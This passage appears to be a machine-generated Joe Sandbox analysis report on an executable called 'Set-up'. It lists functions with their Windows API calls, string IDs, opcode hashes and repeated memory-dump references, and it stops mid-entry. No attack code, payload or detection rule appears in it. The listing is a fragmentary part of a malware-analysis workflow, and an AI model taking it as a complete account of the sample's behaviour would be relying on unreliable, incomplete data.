                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: !af_$NumCast$RegQueryKeyEx()$RegQueryValueExW()$datavect<unsigned char>::begin$value >= 0
                                                                                                                                  • API String ID: 3970428279-1042171720
                                                                                                                                  • Opcode ID: 0fff043a415af68505ef22ebb8fd8b57f2d17e0db9d10c148bbcd19bd875db30
                                                                                                                                  • Instruction ID: 293279926b0872889a8c3b8b13c7326c81094c6a5a4dbca5b9d4b1121883b1bc
                                                                                                                                  • Opcode Fuzzy Hash: 0fff043a415af68505ef22ebb8fd8b57f2d17e0db9d10c148bbcd19bd875db30
                                                                                                                                  • Instruction Fuzzy Hash: 649199B4A40209EFDF14DFA0D855BAEBBF5FB08754F104229E921B72C0DB75A915CBA0
                                                                                                                                  Function 00F13120 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 165COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000020,460C02D8,00000000,?,00000000), ref: 00F13152
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00F13179
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00F13185
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F131B3
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,00000000,00000000), ref: 00F13225
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,00000000,00000000), ref: 00F13270
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,00000000,00000000), ref: 00F132BB
                                                                                                                                    • Part of subcall function 00F13480: EnterCriticalSection.KERNEL32(0131BE48), ref: 00F134B6
                                                                                                                                    • Part of subcall function 00F13480: GetCurrentThreadId.KERNEL32 ref: 00F134C7
                                                                                                                                    • Part of subcall function 00F13480: new.LIBCMT ref: 00F134E1
                                                                                                                                    • Part of subcall function 00F13480: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13530
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020), ref: 00F132E1
                                                                                                                                  Strings
                                                                                                                                  • QueryPerformanceCounter(), xrefs: 00F13192
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$CounterCurrentErrorExceptionException@8LastPerformanceQueryRaiseThreadThrow
                                                                                                                                  • String ID: QueryPerformanceCounter()
                                                                                                                                  • API String ID: 1964512917-1461196644
                                                                                                                                  • Opcode ID: a1c8cb7971ac30f5ab9a065c7411b90e6cc5f204ece3b3043ebd51e4f1efecf6
                                                                                                                                  • Instruction ID: e46d6b2fba448b4ca6048d267de7cd01983b00ff9b4123a50546cc7842c12c7d
                                                                                                                                  • Opcode Fuzzy Hash: a1c8cb7971ac30f5ab9a065c7411b90e6cc5f204ece3b3043ebd51e4f1efecf6
                                                                                                                                  • Instruction Fuzzy Hash: 7F51D872E002059BCB28DF59D885A9EB7FDFB89720F1042AEE815D7344DB349945DB90
                                                                                                                                  Function 00E5A5F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetAclInformation.ADVAPI32(460C02D8,?,0000000C,00000002,?,?), ref: 00E5A63F
                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?,?,?), ref: 00E5A673
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,?,?), ref: 00E5A681
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A711
                                                                                                                                    • Part of subcall function 00E5A4D0: LocalAlloc.KERNEL32(00000000,00000008), ref: 00E5A4F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocLocal$ErrorException@8InformationLastThrow
                                                                                                                                  • String ID: GetAclInformation()$LocalAlloc()
                                                                                                                                  • API String ID: 1246304920-2239764287
                                                                                                                                  • Opcode ID: 53dc2ad9729c610a9be5732baaa365250d3afffff746aa5cb2d5ba82df9242e0
                                                                                                                                  • Instruction ID: 5910ccebbf997bbce589ec4ea4129fcc90da9e951e88b45634eca174dd27add1
                                                                                                                                  • Opcode Fuzzy Hash: 53dc2ad9729c610a9be5732baaa365250d3afffff746aa5cb2d5ba82df9242e0
                                                                                                                                  • Instruction Fuzzy Hash: EB312771700209ABDB28AFB5DC85E7EB7B9EF54345F14093DF902E72C0DA7098489762
                                                                                                                                  Function 00E52640 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,460C02D8), ref: 00E52681
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5268F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E52779
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E526BE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000001,?,?), ref: 00E52743
                                                                                                                                  Strings
                                                                                                                                  • TryGetEnvironmentVariableT: GetEnvironmentVariable(2), xrefs: 00E52896
                                                                                                                                  • TryGetEnvironmentVariableT: GetEnvironmentVariable(1), xrefs: 00E5286A
                                                                                                                                  • GetEnvironmentVariableT: GetEnvironmentVariable, xrefs: 00E5293C
                                                                                                                                  • GetCurrentDirectory(), xrefs: 00E5269D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$Concurrency::cancel_current_taskErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetCurrentDirectory()$GetEnvironmentVariableT: GetEnvironmentVariable$TryGetEnvironmentVariableT: GetEnvironmentVariable(1)$TryGetEnvironmentVariableT: GetEnvironmentVariable(2)
                                                                                                                                  • API String ID: 3139870734-3647665761
                                                                                                                                  • Opcode ID: 59c93f3d1d0ab4a08a8ee76a561a98ee32d6b9b76d4ddc6711ef2269d2b84e5d
                                                                                                                                  • Instruction ID: da8fc0d973626614919f6d458fb2cef4ec1b4ea879f02d9395410a6124921b62
                                                                                                                                  • Opcode Fuzzy Hash: 59c93f3d1d0ab4a08a8ee76a561a98ee32d6b9b76d4ddc6711ef2269d2b84e5d
                                                                                                                                  • Instruction Fuzzy Hash: D73106716002059BCB24EF64DC05B6FB7F8EF88714F00492EE925A7280DFB5A848CB95
                                                                                                                                  Function 00E47D00 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 306fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00004000,?,00000000,460C02D8), ref: 00E47D65
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E47D88
                                                                                                                                  • WriteFile.KERNEL32(?,?,00010000,?,00000000,460C02D8), ref: 00E48005
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E48024
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite$BreakConcurrency::cancel_current_taskConsoleDebugDebuggerModuleNamePresent
                                                                                                                                  • String ID: !af_ && i<s_$WriteConsoleW()$WriteFile()$datavect<unsigned char>::operator []
                                                                                                                                  • API String ID: 4012916999-2701911002
                                                                                                                                  • Opcode ID: 8590c97ec87e1620d28c5621052975abd2f938598af57555f038310eb67acaef
                                                                                                                                  • Instruction ID: be78ab8b28e9bf24a8027973e869da0b2b7de5cd1557495be6bb7528ddb1347f
                                                                                                                                  • Opcode Fuzzy Hash: 8590c97ec87e1620d28c5621052975abd2f938598af57555f038310eb67acaef
                                                                                                                                  • Instruction Fuzzy Hash: 34C1A271A042498FCB24CFA8D480BAEBBF1FF58314F14466DE495A7381D771A949CB90
                                                                                                                                  Function 00E6BAC0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 218fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileType.KERNEL32(?,?,?,?), ref: 00E6BAF1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00E6BAFD
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BB5C
                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,460C02D8,00000401,?,00000000), ref: 00E6BC6D
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00E6BCF2
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BD36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastThrow$CopyType
                                                                                                                                  • String ID: CopyFileW()$GetFileType()
                                                                                                                                  • API String ID: 1577141544-1015916104
                                                                                                                                  • Opcode ID: 9fbd90caa35636bfd653b1b8534e91e3db1d6c8dd500168b530f7cbc4d2957ab
                                                                                                                                  • Instruction ID: 5150cb9a96b436c6f8cee05bc52c3252dd79bf968ba40fa555e01f961d8f50d4
                                                                                                                                  • Opcode Fuzzy Hash: 9fbd90caa35636bfd653b1b8534e91e3db1d6c8dd500168b530f7cbc4d2957ab
                                                                                                                                  • Instruction Fuzzy Hash: 57819C70A01249EFDB18DFA4D958BAEBBF8BF44314F144169E411E7380DB75AA08CBA1
                                                                                                                                  Function 00E70110 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 197COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E70145
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$BreakConcurrency::cancel_current_taskDebugDebuggerFileModuleNamePresentProcessThread
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<class basic_ncstring<wchar_t> *>::operator []$datavect<struct WWLib::RegItem *>::operator []$datavect<struct WWLib::RegItem *>::size$ncvector<class basic_ncstring<wchar_t> >::operator []$ncvector<struct WWLib::RegItem>::push_back
                                                                                                                                  • API String ID: 4028080653-3118977989
                                                                                                                                  • Opcode ID: 2e485b77abb2848ddb2ce493af31a10ef0dcf427c86f2a8a4d4bea5d6cb95761
                                                                                                                                  • Instruction ID: 35cebb10254393b7c66db5677e0018404d654437ef9d47293709f3d1cd36186f
                                                                                                                                  • Opcode Fuzzy Hash: 2e485b77abb2848ddb2ce493af31a10ef0dcf427c86f2a8a4d4bea5d6cb95761
                                                                                                                                  • Instruction Fuzzy Hash: E0612071600749EFDB24CF59D845F6AB7E4FB10728F00C62DE8696B692C7B5AD04CB90
                                                                                                                                  Function 00E6ECE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 00E6ED87
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00E6EEAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: !af_$NumCast$RegQueryKeyEx()$RegQueryValueExW()$datavect<unsigned char>::begin$value >= 0
                                                                                                                                  • API String ID: 3660427363-1042171720
                                                                                                                                  • Opcode ID: 12407abbbf8e31a4603a4617c739a014842c2411f902a3e21d5a2dd1cb948aae
                                                                                                                                  • Instruction ID: 9901f68c4504c40119c5d94a63b29aa0c9686a722813e94ce317e37b71efbda2
                                                                                                                                  • Opcode Fuzzy Hash: 12407abbbf8e31a4603a4617c739a014842c2411f902a3e21d5a2dd1cb948aae
                                                                                                                                  • Instruction Fuzzy Hash: 03618874A00209EBDF18DF60D895BAEBBB5FB48358F104129E921B72C0D775A959CFA0
                                                                                                                                  Function 0106EF80 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 179COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SrcHashImpl::SrcHashImpl.MSPDB140-MSVCRT ref: 0106F00E
                                                                                                                                  • SrcHashImpl::SrcHashImpl.MSPDB140-MSVCRT ref: 0106F0F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
